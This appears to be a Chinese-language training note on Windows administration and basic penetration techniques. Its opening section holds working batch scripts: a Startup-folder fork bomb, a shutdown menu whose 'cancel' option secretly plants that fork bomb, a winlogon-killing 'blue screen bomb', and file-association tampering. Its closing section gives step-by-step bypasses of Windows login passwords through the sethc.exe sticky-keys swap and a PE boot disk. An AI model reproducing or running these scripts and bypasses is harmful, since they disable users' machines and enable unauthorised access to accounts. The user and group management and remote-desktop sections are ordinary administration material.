上次回顾

开机无限开启dos窗口

@echo off
copy game.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
:d
start
goto d

定时关机脚本

@echo off
title 关机脚本
color 0a
:menu
cls
echo =======================
echo          菜单
echo       1.定时关机
echo       2.取消定时关机
echo       3.退出
echo =======================

set /p num=您的选择: 
if "%num%"=="1" goto 1
if "%num%"=="2" goto 2
if "%num%"=="3" goto 3
echo 只能输入1/2/3
pause
goto menu

:1
set /p a=输入时间(单位/秒): 
shutdown -s -f -t %a%
goto menu

:2
echo :a >>"%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\haha.bat"
echo start >>"%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\haha.bat"
echo goto a >>"%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\haha.bat"
goto menu

:3
exit

windows server 2003 蓝屏炸弹

直接尝试杀死登录进程,因为执行脚本时处于登录状态,无法杀死,脚本运行一段时间后就会蓝屏

@echo off
echo :a >>"%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\blue.bat"
ntsd -c q -pn winlogon.exe

关闭桌面

可以将自动关机脚本部署在启动目录,开机自动脚本,开机无桌面内容

@echo off
taskkill /im explorer.exe /f >nul 2>nul

ping -n 5 127.0.0.1 >nul 2>nul
start c:\windows\explorer.exe
pause

篡改文件关联性

@echo off
assoc .txt=exefile
assoc .wav=exefile
assoc .bmp=exefile

:: 恢复
:: assoc .txt=exefile
:: assoc .wav=exefile
:: assoc .bmp=exefile

用户与组管理

用户管理

每一个用户登录系统后,拥有不同的操作权限.每个账户有自己唯一的SID(安全标识符).windows系统管理员administrator的UID是500,普通用户的UID是1000开始,默认密码最长有效期42天

  • 用户SID: S-1-5-21-426206823-2579496042-14852678-500
  • 系统SID: S-1-5-21-426206823-2579496042-14852678
  • 账户密码存储位置: c:\windows\system32\config\SAM
  • 查看sid值: whoami /user

内置账户

  • 给人使用的账户
  1. administrator #管理员账户
  2. guest #来宾账户
  • 计算机服务组件相关的系统账号
  1. system #系统账户 权限至高无上
  2. local services #本地服务账户 权限等于普通用户
  3. network services #网络服务账户 权限等于普通用户

配置文件

每个用户都有自己的配置文件(家目录),在用户第一次登录时自动产生

  • win7/win2008 c:\用户\
  • xp/win2003 c:\Documents and Settings\

用户管理命令

:: 查看用户列表
net user 
:: 改密码
net user 用户名 密码
:: 创建一个新用户
net user 用户名 密码 /add
:: 删除一个用户
net user 用户名 /del
:: 激活账户
net user 用户名 /active:yes
:: 禁用账户
net user 用户名 /active:no

组管理

组的作用: 简化权限的赋予

内置组

  1. 管理员组 : administrators
  2. 来宾组 : guests
  3. 普通用户组(默认) : users
  4. 网络配置组 : network
  5. 打印机组 : print
  6. 远程桌面组 : Remote Desktop

组管理命令

:: 查看组列表
net localgroup
:: 查看该组的成员
net localgroup 组名
:: 创建一个新的组
net localgroup 组名 /add
:: 添加用户到组
net localgroup 组名 用户名 /add
:: 从组中踢出用户
net localgroup 组名 用户名 /del
:: 删除组
net localgroup 组名 /del

服务器远程管理

windows远程管理有2种类型,远程桌面(图形),telnet(命令行)

QQ截图20201109093637.png

远程桌面

  1. 首先将配置网络,并实现客户机与服务器可以互通
  2. 服务器开启允许被远程控制: 我的电脑右键属性 -- 远程 -- 选择允许 -- 确定
  3. 客户机上: 开始 -- 运行 -- mstsc 打开远程连接工具
  4. mstsc工具上输入服务器的IP并点击确定
  5. 输入服务器的账号及密码

QQ截图20201109094020.png

如使用非管理员账户登录远程,需要在服务器上将用户加入到远程桌面内置组Remote Desktop Users

QQ截图20201109094316.png

QQ截图20201109094137.png

telnet

  1. 首先将配置网络,并实现客户机与服务器可以互通
  2. 服务器开启允许被telnet远程控制: 开始 -- 运行 -- services.msc,并开启telnet服务
  3. 客户机上: 开始 -- 运行 -- cmd
  4. 在命令行窗口中输入: telnet 10.1.1.2
  5. 输入服务器的账号及密码

如服务器是2008及更高版本系统,需要再第二步前先按照telnet服务: 计算机右键管理 -- 功能 -- 安装 telnet 服务,另外如使用非管理员账户登录远程,需要再服务器上将用户加入到远程桌面内置组中

QQ截图20201109095230.png

QQ截图20201109095021.png

绕过windows系统密码

利用5次shift漏洞绕过win7密码

在未登录系统时,连续按5次shift键,弹出程序c:\windows\system32\sethc.exe,如果将sethc.exe替换为cmd.exe,那么就会弹出cmd.exe.部分win7及win10系统在未进入系统时,可以通过系统修复漏洞篡改系统文件名.如win7或win10系统已修补漏洞则无法利用

渗透过程相关知识

  • cmd工具路径 : c:\windows\system32\cmd
  • 用户/账户密码存储位置 : c:\windows\system32\config\SAM
  • 修改账户密码 : net user 用户名 新密码

漏洞利用过程

1、开启win7虚拟机,开机,并设置一个复杂密码 2、关机,并开机,在出现windows启动界面时强制关机 3、再开机,出现“启动修复(推荐)”及选择该项 # 如未出现,多尝试几次第2步,如还不行,请换其他方法

QQ截图20201109100859.png

4、出现系统还原提示,点击取消,等待几分钟后,会出现问题原因,点击查看详细信息

QQ截图20201109101022.png

QQ截图20201109101047.png

5、打开最后一个链接即一个记事本

QQ截图20201109102847.png

6、记事本中点打开,并选择显示所有文件

QQ截图20201109102932.png

7、找到sethc并改名sethc-bak,再找到cmd,复制一份cmd改名为sethc

QQ截图20201109103037.png

QQ截图20201109103133.png

8、全部关闭,重启 9、系统启动完毕后,连续按5次shift键,将弹出cmd工具,使用命令net user 用户名 新密码,将当前用户密码修 改掉即可,或者另外新建用户,并提升为管理员,注销后,可再删除新建的用户

QQ截图20201109103914.png

利用PE系统破解XP密码

PE系统,独立于硬盘系统的微型系统,通过PE系统启动可以对系统的SAM文件做修改

  1. 制作PE工具,插入空U盘,一键制作PE系统到U盘
  2. 为XP系统设置一个复杂密码,并关机.
  3. 插入带有PE系统的U盘或光盘,开机,马上按F2,进入BIOS,设置启动顺序为U盘或光盘为第一位,保存
  4. 重启,进入PE菜单或PE系统,使用破解密码程序进行破解